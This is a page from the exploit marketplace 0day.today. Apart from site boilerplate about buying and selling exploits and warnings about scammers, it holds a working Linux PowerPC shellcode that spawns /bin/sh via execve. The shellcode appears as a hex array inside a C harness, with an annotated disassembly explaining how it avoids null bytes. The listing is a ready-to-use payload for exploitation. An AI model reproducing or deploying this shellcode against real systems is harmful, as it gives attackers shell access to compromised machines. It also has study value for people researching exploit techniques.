0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux/ppc execve /bin/sh 112 bytes
================================== linux/ppc execve /bin/sh 112 bytes ================================== /* * Linux PPC shellcode * execve() of /bin/sh by Palante */ long shellcode[] = { /* Palante's linuxPPC shellcode w/ NULL*/ 0x7CC63278, 0x2F867FFF, 0x41BC0054, 0x7C6802A6, 0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4, 0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14, 0x7CC419AE, 0x7C042A14, 0x7CE72850, 0x7C852A14, 0x7C63212E, 0x7C832214, 0x7CC5212E, 0x7CA52A78, 0x44FFFF02, 0x7CE03B78, 0x44FFFF02, 0x4BFFFFB1, 0x2F62696E, 0x2F73685A, 0xFFFFFFFF, 0xFFFFFFFF }; void main() { __asm__("b shellcode"); } /* disassembly .section ".text" # Palante's LinuxPPC shellcode .align 2 .globl m .type m,@function m: xor 6,6,6 # r6 is 0 cmpi 7,0,6,0x7FFF # do meaningless compare bc 13,28,L2 # conditional branch to L2 - CAUSES NULL BYTE L1: mfspr 3,8 # address of /bin/sh into r3 (execve parameter) sth 6,-7(3) # fix sc opcode sth 6,-15(3) # fix sc opcode addi 4,6,0x7FF0 addi 5,6,0x7FF4 addi 7,6,0x7FF3 xor 5,5,4 #got 0x4 into r5 xor 7,7,4 #got 0x3 into r7 add 4,5,7 # r4 = 0x7 stbx 6,4,3 # store null after /bin/sh add 0,4,5 # this makes 11 which is the execve system call sub 7,5,7 # r7 = 0x1 for exit system call add 4,5,5 # r4 = 0x8 stwx 3,3,4 # and store pointer to /bin/sh at r3+0x8 add 4,3,4 # r4 = r3 + 0x8 (execve parameter) stwx 6,5,4 # store NULL pointer xor 5,5,5 # NULL (execve parameter) .long 0x44ffff02 # not quite an sc opcode or 0,7,7 # syscall 1 - exit .long 0x44ffff02 # not quite an sc opcode L2: bl L1 # branch and link back to L1 .long 0x2F62696E #/bin/shZ .long 0x2F73685A .long 0xffffffff # this is where pointer to /bin/sh goes .long 0xffffffff # this is where null pointer goes .Lfe1: .size m,.Lfe1-m */ # 0day.today [2024-12-25] #